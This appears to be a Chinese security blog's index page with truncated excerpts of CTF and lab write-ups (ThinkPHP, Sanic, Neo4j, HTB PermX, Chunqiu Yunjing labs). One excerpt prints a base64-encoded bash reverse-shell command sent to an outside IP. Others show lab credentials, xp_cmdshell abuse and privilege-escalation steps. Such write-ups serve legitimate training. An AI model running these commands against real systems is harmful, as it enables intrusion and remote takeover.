Prain清雨博客v1.3.0审计
Prain清雨博客v1.3.0审计
某比赛里面出现的一道题目
赛时都花时间在做渗透上面了 今天抽出点时间来看看
路由
这个是一个极度轻量化的博客框架 所有的路由控制都在index.php这一个文件里面
首先调用他定义的get方法
这里我们访问的是/目录 为空 默认为index
使用$_SERVER[‘REQUEST_URI’]获取访问的路由
一系列的匹配之后 返回了XDEBUG_SESSION_START=18778这个值
后面就是一系列包含文件 检验安装的操作
然后进到switch里面 查询是否有匹配的路由 存在则反感会页面 否则返还404
比如index 访问/?index
这里显然不存在这个文件 返回空
后台插件rce漏洞该漏洞需要登录 漏洞点出现在?import路由
这个是一个上传主题的地方 这个博客允许上传自定义主题
123456789101112131415if(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION) == 's ...
2024 n00bzctf web wp
2024 n00bzctf web wp
最近回到家里 煞笔浙江40多度 不想出门
看了好几天春秋杯的那个mycms 没啥思路 想摆了(划掉)
逛网站 在CTF赛事中心 - Bugku CTF 发现了这个比赛 上来玩玩
题目不是很难 一个小时就ak了。。。水点博客
Passwordless代码
1234567891011121314151617181920212223242526272829303132#!/usr/bin/env python3from flask import Flask, request, redirect, render_template, render_template_stringimport subprocessimport urllibimport uuidglobal leetapp = Flask(__name__)flag = open('/flag.txt').read()leet=uuid.UUID('13371337-1337-1337-1337-133713371337')@app.rou ...
从ciscn2024 sanic和DASCTF2024 Sanic's revenge 学sanic原型链污染
从ciscn2024 sanic和DASCTF2024 Sanic’s revenge 学sanic原型链污染
四川回来 给机房带来了久违的流感
ciscn2024 sanic访问/src给出源码
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354from sanic import Sanicfrom sanic.response import text, htmlfrom sanic_session import Sessionimport pydash# pydash==5.1.2class Pollute: def __init__(self): passapp = Sanic(__name__)app.static("/static/", "./static/")Session(app)@app.route('/', methods=[&# ...
2024 ciscn 决赛 记录+部分wp
2024 ciscn 决赛 记录+部分wp
第一次国赛决赛 还是很激动的一次比赛
感谢A1natas的小伙伴给予我的帮助 最后混了一个二等奖
day0从杭州萧山飞到成都
四川话听起来还是巴适 这里我就不得不吐槽某一个队员的方言了
比赛举办在四川大学 酒吧舞就是不一样啊 学校看起来就是牛逼
场地在体育馆(怎么又是体育馆 想起来某一次比赛的经历了 说的就是华东南) 开了空调 这空调嘎嘎得劲 回去就吹感冒了
成都是真的不夜城 晚上11点了还是灯火通明
晚上吃了顿火锅(都来四川了不试试?)我草好辣(已老实求放过)
晚上才看到要配置相关可信计算的环境(主办方现在才发 也是厉害的)环境配置到凌晨两点多 第二天起来感觉要寄了
day1第一天是可信计算+awdp 做了点web 然后看边上的大哥对着计算无能狂怒
awdp 绝对是防守修复放在第一位的 防守check过了之后 每一次都可以继续得分
ezjs
fix不许上传ejs文件 但是应该是可以存在rce的
直接加上一个对ejs文件的文件内部文件过滤 随便过滤点就成功修了
break攻击的话 有很多的思路
赛后发现可以是往 n ...
春秋云镜-ThermalPower
春秋云镜-ThermalPower外网使用nmap扫描所给的web服务
访问8080
使用dirsearch扫描泄露文件
确定是heapdump泄露 下载泄露文件
分析得到shirokey
1algMode = CBC, key = QZYysgMYhG6/CzIJlVpR2g==, algName = AES
shiro attack一把梭
得到flag1
弹shell出来 搭建代理
走代理的扫描有点问题 还是上传之后扫描
172.22.17.6:21存在一个ftp服务 可以匿名登录
1proxychains ftp 172.22.17.6
连接很不稳定 直接使用浏览器访问
在SCADA 得到一个用户密码
123WIN-SCADA: 172.22.26.xxUsername: AdministratorPassword: IYnT3GyCiy3
fscan扫描 查看
注意到有一个内部员工通讯录和一个火创能源内部通知
注意到初始账号密码格式 scada工程师只有这些
也就是这些密码
12345678910chenhua/chenhua@0813zh ...
春秋云镜-Tsclient
感觉已经国赛已经寄了 四川旅游计划 启动
春秋云镜-Tsclient外网先扫描端口
尝试爆破mssql的账号密码
得到密码为1qaz!QAZ 成功登录mssql
激活xpcmdshell 成功执行命令
msf生成shell 反弹到自己的vps上面来
使用msf自动提权
得到第一个flag
搭建隧道 把流量传出来
扫描内网
1234567891011121314151617181920212223[*] 172.22.8.31 XIAORANG\WIN19-CLIENT [*] 172.22.8.15 [+]DC XIAORANG\DC01 [*] WebTitle:http://172.22.8.18 code:200 len:703 title:IIS Windows ServerNetInfo:[*]172.22.8.18 [->]WIN-WEB [->]172.22.8.18 [->]2001:0:348b:fb58:3c9d:2e4a:d89d:b ...
春秋云镜-Time
春秋云镜-Time外网
nmap扫描端口 只扫描出来22端口 令我很是疑惑
用goby进行信息收集
注意到开启了7474端口 直接访问
存在Neo4j shell 漏洞 CVE-2021-34371 脚本一把梭
1java -jar rhino_gadget-1.0-SNAPSHOT-fatjar.jar rmi://39.98.127.126:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTEuMjI5LjIwMi4xNjQvMzIzMiAwPiYx}|{base64,-d}|{bash,-i}"
成功反弹shell
在tmp目录下上传fscan
查看当前网段
12当前内网IP 172.22.6.36./fscan -h 177.22.6.36/16 >> out.txt
找到以下主机
123[*] 172.22.6.12 [+]DC XIAORANG\DC-PROGAME Windows Server 2 ...
春秋云镜-Initial
我顶!
春秋云镜-Initial外网开始的时候给了一个ip 直接扫描端口
80端口 上去看看
注意到是title 明显是thinkphp
工具跑一下 发现存在ThinkPHP 5.0.23 RCE
一键getshell之后 蚁剑连接
上传linux-exploit-suggester 到tmp目录下 提权
可以看到sudo 提权
sudo -l 查看
mysql存在sudo权限
注意的是蚁剑的shell是模拟出来的shell 不能直接使用/bin/sh 提权
得到flag1
1flag{60b53231-
查看内网ip
上传 fscan 扫描内网
搭建代理 传递流量出来
172.22.1.18
弱密码admin/admin123 登录
网上翻找有没有payload
12345678910111213141516171819202122232425262728293031323334import requestssession = requests.session()url_pre = 'http://172.22 ...
HTB PERMX
HTB PERMX
逛htb的时候发现有个seasonal挑战 看看又是简单题 我就玩玩
这次我选择使用window 的openvpn链接上那边环境 方便我使用本地的工具啥的
扫到了奇奇怪怪的服务 先访问80端口
域名为http://permx.htb/ 写入hosts文件之后成功访问
没什么东西 好像是静态网页爆破一下子域名
爆破出来一个lms域名
一个cms 上网查到一个cve CVE-2023-4220-Chamilo
直接存在工具 拿来打
成功写入webshell
使用工具反弹shell出来
查看本地ip
当前是wwwdata权限 无权进入mtz 的home
注意到存在/var/www/chamilo/app/config目录
读取到数据库
chamilo 03F6lY3uXAP2bkW8
数据库翻了翻 没找到什么关键信息 猜测数据库和ssh同密码
尝试直接ssh登录 成功登录
尝试提权
注意到存在 /opt/acl.sh 可以给任意用户 任意文件的任意权限
我们可以给与&#x ...
php代码审计-Thinkphp<5.*
php代码审计-Thinkphp<5.*
自己对于这种大项目的审计能力还是很差 从先从最经典的thinkphp开始学起
Thinkphp2.x远古项目 在vulhub/thinkphp-2.1: 互联网考古,ThinkPHP2.1带示例和文档完整包 (github.com)下载
配置环境的时候切记使用apache 使用nignx会莫名其妙的各种问题
环境 php5.59 thinkphp2.1x
路由分析主要控制路由的文件在ThinkPHP内置的Dispatcher类里面
这个类负责把路由映射到对应的控制器上
调用自己的self::routerCheck()方法 查看当前的路由规则
路由包括好几种 不过都大差不差
123456789101112131415if(0 === stripos($regx.$depr,$route[0].$depr)) { // 简单路由定义:array('路由定义','分组/模块/操作名', '路由对应变量','额外参数& ...